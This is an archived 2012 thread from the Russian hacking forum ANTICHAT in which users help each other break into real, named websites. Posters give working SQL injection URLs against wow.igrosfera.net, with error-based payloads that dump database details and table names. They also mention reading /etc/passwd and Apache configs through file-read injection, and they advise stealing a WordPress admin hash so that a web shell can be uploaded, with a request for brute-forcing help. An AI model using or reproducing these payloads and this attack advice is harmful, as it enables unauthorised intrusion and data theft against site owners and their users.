ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.06.2012, 17:16
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от shadowrun
shadowrun said:
en.ayinger-bier.de/?pid=263+group+by+1+--+
Наставьте на правильный путь...
blind
|
|
|
19.06.2012, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от kingbeef
kingbeef said:
blind
так не люблю
|
|
|
|
20.06.2012, 02:06
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3
UPD: нашел ) Includes/config.php
|
|
|
|
20.06.2012, 02:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
[/COLOR][COLOR="#0000BB"]DocumentRoot[/COLOR][COLOR="#DD0000"]"/var/www/html"
[/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#FF8000"]# This should be changed to whatever you set DocumentRoot to.
#
[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]public_html[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]music[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][/COLOR]
Где правду искать ? |
|
|
|
20.06.2012, 04:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
7695
Репутация:
-5
|
|
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3
|
|
|
|
20.06.2012, 05:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
Код:
Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ? |
|
|
|
20.06.2012, 05:30
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от CyberKillerz
CyberKillerz said:
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3
Код:
Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1))))
|
|
|
|
20.06.2012, 08:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
7695
Репутация:
-5
|
|
Сообщение от trololoman96
trololoman96 said:
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
Код:
Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ? Хм ты намекаешь на его уязвимость ? я просто начинающий )
|
|
|
|
20.06.2012, 09:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
Сообщение от CyberKillerz
CyberKillerz said:
Хм ты намекаешь на его уязвимость ? я просто начинающий )
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
|
|
|
|
20.06.2012, 09:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
7695
Репутация:
-5
|
|
Сообщение от smirk
smirk said:
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?3183312){kind=avatar}
Похожие темы
Линейный вид
